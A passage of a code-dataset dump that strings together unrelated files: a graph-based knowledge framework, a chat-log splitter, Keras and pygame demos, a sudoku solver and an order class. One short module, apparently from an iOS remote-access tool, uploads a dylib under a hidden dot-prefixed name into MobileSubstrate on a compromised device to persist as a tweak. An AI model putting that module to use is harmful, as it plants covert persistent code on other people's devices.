KF(DiGraph):\n def __init__(self, data=None, proof_type=1, **attr):\n # set up some eseential predicates is a default predicate\n super(KF, self).__init__(data, **attr)\n name = Predicate(id=\"name\") # name labels\n empirical = Predicate(id=\"empirical\") # neural labels.\n analytical = Predicate(id=\"analytical\") # expression labels\n dimension = Predicate(id=\"dimension\") # mutually exclusive set label\n instance = Vision(id=\"instance\")\n complement = Predicate(id=\"complement\")\n AND= Predicate(id=\"and\")\n OR=Predicate(id=\"or\")\n self.hash = {\"name\": name, \"neural\": empirical, \"function\": analytical, \"instance\": instance,\n \"dimension\": dimension, \"complement\": complement, \"and\": AND, \"or\": OR}\n super(KF, self).add_nodes_from([value for key, value in self.hash.items()])\n\n def get_node_from_hash(self, hash):\n return self.hash[hash]\n\n def add_node(self, n, name=None, attr_dict=None, **attr):\n super(KF, self).add_node(n, attr_dict, **attr)\n if name != None:\n self.add_name(n, name)\n\n def add_name(self, node, name):\n # Language is implemented this way so that I could hash a concept with a string.\n # Can I use the same method to hash with feature vector? 
Why or why not?\n self.add_node(name)\n self.add_edge(node, name, method=\"culture\") # The content of the word\n self.add_edge(name, self.hash[\"name\"], method=\"culture\") # This predicate is a name\n\n def find_node_by_name(self, name_string):\n # find_name does not actually give you string node, but the predicates with this name.\n # find_name is problematic, since it returns all the nodes with a name\n try:\n return self.predecessors(name_string)\n except KeyError:\n print(name_string, \"is not a word that I recognize.\")\n\n def find_node_by_name_unique(self, name_string):\n return self.find_name(name_string)[0]\n\n def successors_set(self, nlist):\n ll = []\n for n in nlist:\n ll = ll + self.successors(n)\n return set(ll)\n\n def predecessors_set(self, nlist):\n ll = []\n for n in nlist:\n ll = ll + self.predecessors(n)\n return set(ll)\n\n def find_alien(self):\n # TODO\n pass\n\n def find_trivial(self):\n # TODO\n pass\n\n def get_instance(self):\n return self.hash[\"instance\"]\n\n def static_proof(self, target, source=None, return_path=False):\n if source == None:\n source = self.get_instance()\n try:\n if return_path == True:\n return networkx.shortest_path(self, source, target)\n else:\n if networkx.shortest_path(self, source, target):\n return True\n except networkx.NetworkXNoPath:\n return False\n\n def new_AND(self, and_set, target, nontrivial=True):\n # Partially enforce non-triviality condition through initialization\n and_set=set(and_set)\n new_and = AND(self, and_set, id=' and '.join(str(e) for e in and_set))\n self.add_node(new_and)\n self.add_edges_from((new_and, e) for e in and_set)\n\n if nontrivial == True and self.shortest_path(new_and, target) != None:\n # If nontriviality matters, and indeed it's trivial\n self.remove_node(new_and)\n print(\"Trivial initiation:\", ' and '.join(str(e) for e in and_set))\n return False\n\n self.add_edge(new_and, target) # essential\n self.add_edge(new_and,self.hash[\"and\"])\n\n def new_OR(self, or_set, source, nontrivial=True):\n or_set=set(or_set)\n new_or = OR(self, or_set, id=' or '.join(str(e) for e in or_set))\n self.add_node(new_or)\n self.add_edges_from((e, new_or) for e in or_set)\n\n if nontrivial == True and self.shortest_path(source, new_or) != None:\n self.remove_node(new_or)\n print(\"Trivial initiation:\", ' or '.join(str(e) for e in or_set))\n return False\n\n self.add_edge(source, new_or)\n self.add_edge(new_or,self.hash[\"or\"])\n\n def get_and_watch(self):\n watch_list={}\n all_ands=self.predecessors(self.hash[\"and\"])\n for AND in all_ands:\n new_watch=Watch(self,AND)\n for predicate in AND.predicate_set:\n if predicate in watch_list:\n watch_list[predicate]+=[new_watch]\n else:\n watch_list[predicate]=[new_watch]\n return watch_list\n\n def get_or_watch(self):\n watch_list={}\n all_ors=self.predecessors(self.hash[\"or\"])\n for OR in all_ors:\n new_watch=Watch(self,OR)\n for predicate in OR.predicate_set:\n if predicate in watch_list:\n watch_list[predicate]+=[new_watch]\n else:\n watch_list[predicate]=[new_watch]\n return watch_list\n\n def shortest_path(self, source, target):\n results = self._bidirectional_pred_succ(source, target)\n if results == None:\n return None\n pred, succ, w = results\n\n # build path from pred+w+succ\n path = []\n # from source to w\n while w is not None:\n path.append(w)\n w = pred[w]\n path.reverse()\n # from w to target\n w = succ[path[-1]]\n while w is not None:\n path.append(w)\n w = succ[w]\n\n return path\n\n def _bidirectional_pred_succ(self, source, target):\n # 
Distributed calculation is not implemented, which would really help.\n # Dimensional calculation will help optimize path finding by returning false directly.\n if target == source:\n return ({target: None}, {source: None}, source)\n\n and_watch=self.get_and_watch()\n or_watch=self.get_or_watch()\n print(\"and_watch:\",and_watch)\n print(\"or_watch:\",or_watch)\n\n # G will be directed\n Gpred = self.predecessors_iter\n Gsucc = self.successors_iter\n\n pred = {source: None}\n succ = {target: None}\n\n forward_fringe = [source]\n reverse_fringe = [target]\n\n while forward_fringe and reverse_fringe:\n if len(forward_fringe) <= len(reverse_fringe):\n this_level = forward_fringe\n print(\"forward\", this_level)\n this_watch = and_watch\n forward_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n forward_fringe.append(w)\n pred[w] = source\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in succ:\n return pred, succ, w\n for w in Gsucc(v):\n if w not in pred: # if w has not been explored\n forward_fringe.append(w)\n pred[w] = v\n if w in succ:\n return pred, succ, w\n else:\n this_level = reverse_fringe\n print(\"reverse\", this_level)\n this_watch = or_watch\n reverse_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n reverse_fringe.append(w)\n succ[w] = target\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in pred:\n return pred, succ, w\n for w in Gpred(v):\n if w not in succ:\n reverse_fringe.append(w)\n succ[w] = v\n if w in pred:\n return pred, succ, w\n # One fringe exhausted\n while forward_fringe:\n this_level = forward_fringe\n print(\"forward\", this_level)\n this_watch = and_watch\n forward_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n forward_fringe.append(w)\n pred[w] = source\n # if composite is also a part of another composite, it will\n # be evaluated at the next iteration\n # Once proven, the watch is over\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in succ:\n return pred, succ, w\n for w in Gsucc(v):\n if w not in pred: # if w has not been explored\n forward_fringe.append(w)\n pred[w] = v\n if w in succ:\n return pred, succ, w\n while reverse_fringe:\n this_level = reverse_fringe\n print(\"reverse\", this_level)\n this_watch = or_watch\n reverse_fringe = []\n for v in this_level:\n if v in this_watch:\n for watch in this_watch[v]:\n watch.remove(v)\n if watch.is_complete():\n w = watch.get_AND_OR()\n reverse_fringe.append(w)\n succ[w] = target\n watch_elements = watch.AND_OR.predicate_set\n for predicate in watch_elements:\n this_watch[predicate].remove(watch)\n if not this_watch[predicate]:\n # If predicate has no watch associated\n this_watch.pop(predicate)\n if w in pred:\n return pred, succ, w\n for w in Gpred(v):\n if w 
not in succ:\n reverse_fringe.append(w)\n succ[w] = v\n if w in pred:\n return pred, succ, w\n print(source, target)\n return None\n\n def make_dimension(self, predicate_set, method=None, name=None):\n complement = Predicate(self)\n self.add_node(complement)\n predicate_set.add(complement)\n\n dimension_handle = Analytical(self, XOR, predicate_set, id=\"Temporary:\" + str(predicate_set), method=method)\n self.add_node(dimension_handle, name)\n self.add_edge(dimension_handle, self.hash[\"dimension\"], method=method)\n self.add_edges_from([(a, dimension_handle) for a in predicate_set], method=method)\n return dimension_handle\n\n def is_dimension(self, predicate_or_name):\n if isinstance(predicate_or_name, str):\n predicate = self.find_node_by_name(predicate_or_name)\n else:\n predicate = predicate_or_name\n # Conditions:\n # Must have an analytical method that implements XOR eval function\n analytical_set = set(predicate.predicate_tuple)\n set2 = self.predecessors(predicate)\n if analytical_set != set2:\n return False\n cnt = 0\n\n # Need a hybrid_eval path finder.\n\n def add_property_node(self, property, expression):\n pass\n\n def consistency_search_through_dimensions(self, pred, error_path=False):\n # Does AND OR participate?\n # Find all paths from i to dimension. This operation is inevitable.\n # O(V+E). That's why you need sparse graph. Many nodes, compress edges with function.\n # Find duplicates in the dimensions. You cannot pass through one dimension twice.\n dimension_set = set()\n for path in networkx.all_simple_paths(self, pred, self.hash[\"dimension\"]):\n dimension = path[-2]\n if dimension in dimension_set:\n if error_path == False:\n return False\n else:\n return path\n dimension_set.add(dimension)\n return True\n\n def consistency_checking_merging(self):\n # TODO\n # Certainly you can use looped edges. 
But there will be consequences.\n pass\n","sub_path":"knowledgeframework/kf3.py","file_name":"kf3.py","file_ext":"py","file_size_in_byte":17982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"426256536","text":"import chardet\n\n# chcp 65001\n# https://github.com/zengbin93/jddc_solution_4th/tree/bb23cd0e557fc46ab2bf57f7a941a7ec4c54f3c4/preliminary/data_pre\n# filePath = 'test.txt'\n# filePath_new = 'test_new.txt'\n\nfilePath = 'new.txt'\nfilePath_new = 'chat_zh.txt'\n\ndef detectCode(file):\n data = file.read()\n dicts = chardet.detect(data)\n return dicts[\"encoding\"]\n\ndef transform_text(text):\n \"\"\"特殊字符转换\"\"\"\n str_tf = {\n \"#E-s[数字x]\": \"(微笑)\",\n \"#E-j[数字x]\": \"(愤怒)\",\n \" \": \" \",\n \n }\n # \"[数字x]%\": \"(比例)\",\n # \"[金额x]%\": \"(比例)\",\n # \"%\": \" \",\n # \"#\": \" \",\n # \"&\": \" \",\n for k, v in str_tf.items():\n text = text.replace(k, v)\n return text\n\ndef read_old():\n with open(filePath,'rb') as file:\n print(file.read().decode('GB2312'))\n\ndef split_session(file,file_new):\n \"\"\"分割会话\"\"\"\n # gb18030\n line = file.readline().decode('gb18030')\n line_new = transform_text(line)\n session_id = line_new[:line_new.find('\\t')]\n # session_id = line[:line.find('\\t')]\n index = 0\n\n session_line = 'session:' + str(index) + '\\n\\n'\n print(session_line)\n file_new.write(session_line)\n \n while line:\n tmp = line_new[:line_new.find('\\t')]\n # tmp = line[:line.find('\\t')]\n if tmp != session_id:\n session_id = tmp\n index += 1\n session_line = '\\nsession:' + str(index) + '\\n\\n'\n print(session_line)\n file_new.write(session_line)\n \n print(line_new)\n file_new.write(line_new)\n line = file.readline().decode('gb18030')\n line_new = transform_text(line)\n\nfile = open(filePath,'rb')\nfile_new = open(filePath_new,'r+')\n\n# split_session(file,file_new)\n\n# encode = detectCode(file)\n# read_old()\nsplit_session(file,file_new)\n\nfile.close()\nfile_new.close()\n\n# 32\n# print(len(\"00029c51f92e8f34250d6af329c9a8df\"))\n# print(len(\"0006f1fe48ba77fa7f42b0acab6e2fad\"))","sub_path":"拆分会话/splitSession.py","file_name":"splitSession.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"201103335","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom sudoku.dados import *\nimport bisect\nimport threading\nimport math\n\nTENTATIVAS = 10000\n\n\ndef scale_value(x, minimo=0, maximo=math.e):\n return (x - minimo) / (maximo - minimo)\n\n\ndef transf_e(x):\n return math.e ** x\n\n\ndef tempera(x):\n return scale_value(transf_e(1 - x))\n\n\nclass Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n self.prev = None\n\n\nclass FilaPrioridadeLimitada():\n def __init__(self, maxsize):\n self.queue = []\n self.mutex = threading.Lock()\n self.maxsize = maxsize\n\n def __len__(self):\n return len(self.queue)\n\n def put(self, item):\n self.mutex.acquire()\n if len(self.queue) == self.maxsize:\n self.queue = self.queue[:-1]\n\n bisect.insort(self.queue, item)\n self.mutex.release()\n\n def get(self):\n self.mutex.acquire()\n item = self.queue.pop(0)\n self.mutex.release()\n return item\n\n def getAll(self):\n return [item for item in self.queue]\n\n def last(self):\n self.mutex.acquire()\n last = self.queue[-1]\n self.mutex.release()\n return last\n\n def removeRandom(self):\n self.mutex.acquire()\n value = self.queue[random.randrange(len(self.queue))]\n self.queue.remove(value)\n 
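# release the lock once the queue has been updated\n        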
self.mutex.release()\n\n    def removeLast(self):\n        self.mutex.acquire()\n        self.queue = self.queue[:-1]\n        self.mutex.release()\n\n    def removeAll(self):\n        self.queue = []\n\n    def __iter__(self):\n        return self.queue.__iter__()\n\n\nclass Solver:\n    def __init__(self, tabInicial, k):\n        self.vizinhos = FilaPrioridadeLimitada(k)\n        self.tabInicial = tabInicial\n        self.k = k\n        self.visitados = []\n        self.countErrors = 0\n        self.tentativas = 0\n        import sys\n        self.melhor = sys.maxsize\n        self.contaMelhorSemProgredir = 0\n        self.limite_estagnacao = 500\n        self.porcentagem_limpa = 0.99\n        self.porcentagem_novos = 0.01\n        self.aleatoriedade = False\n        self.considera_visitados = False\n        self.file = open(\"melhores.csv\", \"w\")\n        self.count_calc_fitness = 0\n\n        # self.temperatura =\n\n    ##INICIO ESTRATÉGIAS DE GERACAO DE VIZINHOS DESCARTADAS\n\n    def checkVisitados(self, tab, lin, col):\n\n        if tab.matriz in self.visitados:\n            tab.unflip(lin, col)\n            return False\n        return True\n\n    def dontCheckVisitados(self, tab, lin, col):\n        return True\n\n    def tryByFlip(self, tab, lin, col, vizinhosAtuais, checkVisitados=None):\n        if checkVisitados is None:\n            checkVisitados = self.checkVisitados\n        tab.flip(lin, col)\n        if not checkVisitados(tab, lin, col):\n            return\n        fitness = tab.countInvalidos()\n        try:\n            if fitness < vizinhosAtuais[-1].getFitness():\n                novoTab = tab.clone()\n                novoTab.setFitness(fitness)\n                self.vizinhos.put(novoTab)\n                self.visitados.append(copy.deepcopy(novoTab.matriz))\n        except IndexError:\n            self.countErrors += 1\n            print(\"erro\")\n        finally:\n            tab.unflip(lin, col)\n\n    def proximos_vizinhos_fliptodos(self, tab, vizinhosAtuais):\n\n        for lin in range(9):\n            for col in range(9):\n                if (lin, col) not in tab.preenchidos:\n                    self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n                                   self.checkVisitados if self.considera_visitados \\\n                                   else self.dontCheckVisitados)\n\n    def proximos_vizinhos_flip_um_por_linha_random(self, tab, vizinhosAtuais):\n        for lin in range(9):\n\n            col = random.randrange(0, 9)\n            while (lin, col) in tab.preenchidos:\n                col = random.randrange(0, 9)\n\n            self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n                           self.checkVisitados if self.considera_visitados \\\n                           else self.dontCheckVisitados)\n\n    def proximos_vizinhos_flip_random(self, tab, vizinhosAtuais):\n\n        # for i in range(9):\n        lin, col = (random.randrange(0, 9), random.randrange(0, 9))\n        while (lin, col) in tab.preenchidos:\n            col = random.randrange(0, 9)\n\n        self.tryByFlip(tab, lin, col, vizinhosAtuais, \\\n                       self.checkVisitados if self.considera_visitados \\\n                       else self.dontCheckVisitados)\n\n    def proximo_vizinhos_random_9(self, tab, vizinhosAtuais):\n        for i in range(9):\n            self.proximos_vizinhos_total_random(tab, vizinhosAtuais)\n\n    ##FIM ESTRATÉGIAS DE GERACAO DE VIZINHOS DESCARTADAS\n\n\n\n    def proximos_vizinhos_total_random(self, tab, vizinhosAtuais):\n\n        # for i in range(9):\n        lin, col = (random.randrange(0, 9), random.randrange(0, 9))\n        while (lin, col) in tab.preenchidos:\n            col = random.randrange(0, 9)\n\n        randomnum = random.randrange(1, 10)\n        anterior = tab[lin][col]\n        tab[lin][col] = randomnum\n\n        try:\n            if self.considera_visitados and tab.matriz in self.visitados:\n                tab[lin][col] = anterior\n                return\n\n            fitness = tab.countInvalidos() ##Função objetivo\n            self.count_calc_fitness += 1\n\n            if vizinhosAtuais[-1] and fitness < vizinhosAtuais[-1].getFitness():\n                novoTab = tab.clone()\n                novoTab.setFitness(fitness)\n                tab[lin][col] = anterior\n                if novoTab.matriz not in [tab.matriz for tab in self.vizinhos]:\n                    self.vizinhos.put(novoTab)\n                    if self.considera_visitados:\n                        
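# record the accepted state so it is not proposed again\n                        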
self.visitados.append(copy.deepcopy(novoTab.matriz))\n elif self.aleatoriedade and random.random() >= self.tentativas / TENTATIVAS:\n for i in range(int(self.k * self.porcentagem_novos)): self.vizinhos.removeRandom()\n for i in range(int(self.k * self.porcentagem_novos)):\n novoTab = tab.clone()\n novoTab.setFitness(fitness)\n self.vizinhos.put(novoTab)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(novoTab.matriz))\n\n # except IndexError: print(\"erro\")\n finally:\n tab[lin][col] = anterior\n\n def resolver_sudoku_paralelo(self, metodoVizinhos):\n self.preparacao_inicial()\n while True:\n\n melhor = self.vizinhos.get()\n if melhor.estahResolvido() or self.tentativas == TENTATIVAS:\n return melhor\n self.vizinhos.put(melhor)\n print(melhor.getFitness())\n\n vizinhosAtuais = self.resolver_parte1(melhor)\n\n threads = []\n for v in vizinhosAtuais:\n t = threading.Thread(target=metodoVizinhos, kwargs={\"tab\": v, \"vizinhosAtuais\": vizinhosAtuais})\n t.daemon = True\n t.start()\n threads.append(t)\n\n for t in threads:\n t.join()\n\n self.resolver_parte2()\n\n def resolver_parte1(self, melhor):\n\n if self.aleatoriedade:\n if melhor.getFitness() < self.melhor:\n self.melhor = melhor.getFitness()\n self.contaMelhorSemProgredir = 0\n else:\n self.contaMelhorSemProgredir += 1\n\n if self.contaMelhorSemProgredir > self.limite_estagnacao:\n for i in range(int(self.k * self.porcentagem_limpa)): self.vizinhos.removeRandom()\n for i in range(int(self.k * self.porcentagem_limpa)):\n\n estadoAleatorio = self.tabInicial.preencheAleatorio()\n if estadoAleatorio.matriz not in self.visitados:\n self.vizinhos.put(estadoAleatorio)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(estadoAleatorio.matriz))\n self.contaMelhorSemProgredir = 0\n\n vizinhosAtuais = self.vizinhos.getAll()\n return vizinhosAtuais\n\n def resolver_parte2(self):\n\n print(\"Num de visitados:\", len(self.visitados))\n print(\"Num de vizinhos:\", len(self.vizinhos))\n self.tentativas += 1\n print(self.tentativas)\n\n def preparacao_inicial(self):\n for i in range(self.k):\n estadoInicial = self.tabInicial.preencheAleatorio()\n self.vizinhos.put(estadoInicial)\n if self.considera_visitados:\n self.visitados.append(copy.deepcopy(estadoInicial.matriz))\n\n self.tentativas = 0\n\n def resolver_sudoku_sequencial(self, metodoVizinhos):\n\n try:\n self.preparacao_inicial()\n while True:\n\n melhor = self.vizinhos.get()\n if melhor.estahResolvido() or self.tentativas == TENTATIVAS:\n self.file.write(str(melhor.getFitness()) + \"\\n\")\n return melhor\n self.vizinhos.put(melhor)\n print(melhor.getFitness())\n self.file.write(str(melhor.getFitness()) + \"\\n\")\n\n vizinhosAtuais = self.resolver_parte1(melhor)\n\n for v in vizinhosAtuais:\n metodoVizinhos(v, vizinhosAtuais)\n\n self.resolver_parte2()\n\n finally:\n self.file.close()\n\n\n##MAIN:\n\nopcao = int(input(\"Default [Estratégia 1] (1); Estratégia 3 (3); Estratégia 5 (5); Estratégia 7 (7); ou Customizado (10)? 
\"))\nif opcao == 1:\n # solver = Solver(Tabuleiro(TAB_FACIL, calcPreenchidos=True), 500)\n solver = Solver(TAB_TAREFA, 500)\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 3:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.01\n solver.limite_estagnacao = TENTATIVAS+1\n solver.porcentagem_limpa = 0.0\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 5:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.01\n solver.limite_estagnacao = 500\n solver.porcentagem_limpa = 0.998\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelif opcao == 7:\n solver = Solver(TAB_TAREFA, 500)\n solver.aleatoriedade = True\n solver.porcentagem_novos = 0.0\n solver.limite_estagnacao = 500\n solver.porcentagem_limpa = 0.998\n solucao = solver.resolver_sudoku_sequencial(solver.proximos_vizinhos_total_random)\n\nelse:\n k = int(input(\"Valor do k: \"))\n # solver = Solver(Tabuleiro(TAB_FACIL, calcPreenchidos=True), k)\n solver = Solver(TAB_TAREFA, k)\n\n modos_execucao = [solver.resolver_sudoku_sequencial, solver.resolver_sudoku_paralelo]\n estrategias_vizinho = [solver.proximos_vizinhos_total_random, solver.proximos_vizinhos_fliptodos, \\\n solver.proximos_vizinhos_flip_um_por_linha_random, \\\n solver.proximos_vizinhos_flip_random]\n\n modo_exec = modos_execucao[int(input(\"Sequencial (1) ou Paralelo (2): \")) - 1]\n estrat_vizinho = estrategias_vizinho[\n int(input(\"Geração de vizinhos: Áleatório total (1), Flip todos (2), Flip um por linha (3), ou Flip Aleatório (4)? \")) - 1]\n TENTATIVAS = int(input(\"Quantas iterações: \"))\n\n solver.considera_visitados = True if int(input(\"Considera visitados (1) ou Não (2): \")) == 1 else False\n\n solver.aleatoriedade = True if int(input(\"Aleatoriedade (1) ou Não (2): \")) == 1 else False\n\n if solver.aleatoriedade:\n porcentagem_novos = float(input(\"Porcentagem de remoção na têmpera: \"))\n limite_estagnacao = int(input(\"Limite de estagnação: \"))\n porcentagem_limpa_estagnacao = float(input(\"Porcentagem de limpeza ao estagnar: \"))\n\n solver.porcentagem_limpa = porcentagem_limpa_estagnacao\n solver.limite_estagnacao = limite_estagnacao\n solver.porcentagem_novos = porcentagem_novos\n\n solucao = modo_exec(estrat_vizinho)\n\nsolucao.printthis()\nprint(solucao.fitness)\nprint(\"Avaliações de função objetivo =\", solver.count_calc_fitness)\n","sub_path":"sudoku/solver_com_saltos3.py","file_name":"solver_com_saltos3.py","file_ext":"py","file_size_in_byte":12245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"176632334","text":"class Order():\n filledqty = 0\n isAcked = False\n isOpen = True\n isRejected = False\n\n def __init__(self,id, side, ticker, orderqty, price):\n self.id = id\n self.ticker = ticker\n self.orderqty = int(orderqty)\n self.side = side\n self.price = price\n\n def __str__(self):\n return \"{0} {1} {2} {3} {4} {5} {6}\"\\\n .format(self.id, self.ticker, self.orderqty, self.side,\\\n self.price, self.isAcked,self.filledqty )\n\n def procExcutionReport(self, reportdict):\n reportType = reportdict[\"type\"]\n if reportType == \"ACK\":\n self.isAcked = True\n if reportType == \"FILL\":\n self.fill(reportdict[\"filled_shares\"])\n if reportType == \"REJ\":\n self.reject()\n\n def reject(self):\n self.isRejected = True\n self.isOpen = False\n\n def acked(self):\n 
self.isAcked = True\n\n    def fill(self, fillqty):\n        fillqty = int(fillqty)\n        self.filledqty += fillqty\n        if self.orderqty == self.filledqty:\n            self.isOpen = False\n\n\n","sub_path":"orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"323543606","text":"import numpy as np\nfrom icecream import ic\n\n# 1. Data\nx = np.array([range(100), range(301,401), range(1, 101),\n            range(100), range(401,501)])\nx = np.transpose(x)\n\nic(x.shape)\ny = np.array([range(711, 811), range(101, 201)])\ny = np.transpose(y)\nic(y.shape)\n\n# 2. Build the model\nfrom tensorflow.keras.models import Sequential, Model\nfrom tensorflow.keras.layers import Dense, Input\n\n# The functional model can be changed more flexibly. You only need to pin down the start and end points.\ninput1 = Input(shape=(5,))\ndense1 = Dense(3)(input1)\ndense2 = Dense(4)(dense1)\ndense3 = Dense(10)(dense2)\noutput1 = Dense(2)(dense3)\n\nmodel = Model(inputs=input1, outputs=output1)\n\n# The Sequential model is limited when several models need to be combined later\n# It is convenient when using a single model\n# model = Sequential()\n# model.add(Dense(3, input_shape=(5,)))\n# model.add(Dense(4))\n# model.add(Dense(10))\n# model.add(Dense(2))\n\nmodel.summary()\n\n# 3. Compile, train\n\n# 4. Evaluate, predict\n","sub_path":"keras/keras17-33/keras17_func1.py","file_name":"keras17_func1.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"297871695","text":"backgroundpic=\"space.jpg\"\ncursorpic=\"cursor.png\"\n\nimport pygame\nimport sys\nfrom pygame.locals import *\n\npygame.init()\n\nscreen=pygame.display.set_mode((758,530),0,32)\n\nbackground=pygame.image.load(backgroundpic).convert()\ncursor=pygame.image.load(cursorpic).convert_alpha()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\n\tscreen.blit(background, (0,0))\n\tx,y=pygame.mouse.get_pos()\n#\tx -= cursor.get_width()\n#\ty -= cursor.get_height()\n\t\n\tscreen.blit(cursor, (x,y))\n\t\n\tpygame.display.update()","sub_path":"PYTHON GAME.py","file_name":"PYTHON GAME.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"551995592","text":"class payload:\n    def __init__(self):\n        self.name = \"installpro\"\n        self.description = \"installs eggshell tweak library\"\n        self.type = \"native\"\n        self.id = 126\n\n    def run(self,conn,server,command):\n        server.uploadFile(\"src/binaries/eggshellPro.dylib\",\"/Library/MobileSubstrate/DynamicLibraries/.espro.dylib\",conn)\n        server.uploadFile(\"src/binaries/eggshellPro.plist\",\"/Library/MobileSubstrate/DynamicLibraries/.espro.plist\",conn)\n        return \"respring\"\n","sub_path":"modules/commands/iOS/ios_installpro.py","file_name":"ios_installpro.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"541848596","text":"#License MIT 2016 Ahmad Retha\r\n\r\nimport pygame\r\n\r\npygame.init()\r\nWIDTH = 1366\r\nHEIGHT = 720\r\nSCREEN_SIZE = (WIDTH, HEIGHT)\r\nscreen = pygame.display.set_mode(SCREEN_SIZE)\r\nscreen = pygame.display.set_mode(SCREEN_SIZE , pygame.RESIZABLE)\r\n\r\n\r\nclass Background(pygame.sprite.Sprite):\r\n    def __init__(self, image_file, location):\r\n        pygame.sprite.Sprite.__init__(self) #call Sprite initializer\r\n        self.image = pygame.image.load(image_file).convert_alpha()\r\n        self.rect = 
self.image.get_rect()\r\n self.rect.left, self.rect.top = location\r\n \r\nBackGround = Background('background.png', [0,0]) \r\n\r\n##\r\n# Game mode\r\n#\r\n\r\n\r\n\r\npygame.display.set_caption('Air-Hockey')\r\nclock = pygame.time.Clock()\r\npygame.key.set_repeat(50, 50)\r\npygame.init()\r\nFSC = False\r\nx_thresh = 20\r\ny_thresh = 28\r\n\r\n\r\n\r\n##\r\n# Game consts\r\n#\r\nFONT = pygame.font.Font(None, 120)\r\nFONT1 = pygame.font.Font(None, 30)\r\n\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\nGREEN = (0, 255, 0)\r\nBLUE = (0 ,0, 255)\r\nlight_blue = (0,100,200)\r\nGRAY = (100, 100, 100)\r\nMODE_PLAY = 1\r\nMODE_QUIT = 0\r\nGame = 'stop'\r\nFRAME_RATE = 120\r\n\r\n##\r\n# Game Vars\r\n#\r\nPLAY_AREA_COLOR = (120,50,120)\r\nPLAY_AREA_WIDTH = 50\r\nPLAY_AREA_LEFT_X = 0\r\nPLAY_AREA_RIGHT_X = WIDTH - PLAY_AREA_WIDTH\r\nPLAY_AREA_LEFT_Y = 0\r\nPLAY_AREA_RIGHT_Y = 0\r\nPLAY_AREA_HEIGHT = HEIGHT\r\nscore_left = 0\r\nscore_right = 0\r\ncurrent_mode = MODE_PLAY\r\nBALL_SPEED = 4\r\npos_x = int(0.5 * WIDTH) \r\nspeed_x = BALL_SPEED\r\npos_y = int(0.5 * HEIGHT)\r\nspeed_y = BALL_SPEED\r\nBALL_COLOR = WHITE\r\nBALL_RADIUS = 18\r\nPADDLE_SPEED = 10\r\nPADDLE_HEIGHT = 100\r\nPADDLE_WIDTH = 25\r\nPADDLE_LEFT_COLOR = WHITE\r\nPADDLE_RIGHT_COLOR = WHITE\r\nPADDLE_LEFT_X = int(0.5*PADDLE_WIDTH) + x_thresh\r\nPADDLE_RIGHT_X = WIDTH - int(0.5*PADDLE_WIDTH) - PADDLE_WIDTH - x_thresh\r\npaddle_left_y = int(0.5 * HEIGHT - 0.5 * PADDLE_HEIGHT)\r\npaddle_right_y = paddle_left_y\r\n\r\n\r\n##\r\n# Game loop\r\n#\r\nwhile current_mode == MODE_PLAY:\r\n ##\r\n # Handle keyboard\r\n #\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n current_mode = MODE_QUIT\r\n elif event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE:\r\n current_mode = MODE_QUIT\r\n\r\n keysPressed = pygame.key.get_pressed()\r\n if keysPressed[pygame.K_UP]:\r\n paddle_right_y = paddle_right_y - PADDLE_SPEED\r\n if paddle_right_y < y_thresh:\r\n paddle_right_y = y_thresh\r\n elif keysPressed[pygame.K_DOWN]:\r\n paddle_right_y = paddle_right_y + PADDLE_SPEED\r\n if paddle_right_y > (HEIGHT - PADDLE_HEIGHT - y_thresh):\r\n paddle_right_y = HEIGHT - PADDLE_HEIGHT - y_thresh/2-19\r\n if keysPressed[pygame.K_a]:\r\n paddle_left_y = paddle_left_y - PADDLE_SPEED\r\n if paddle_left_y < y_thresh:\r\n paddle_left_y = y_thresh\r\n elif keysPressed[pygame.K_z]:\r\n paddle_left_y = paddle_left_y 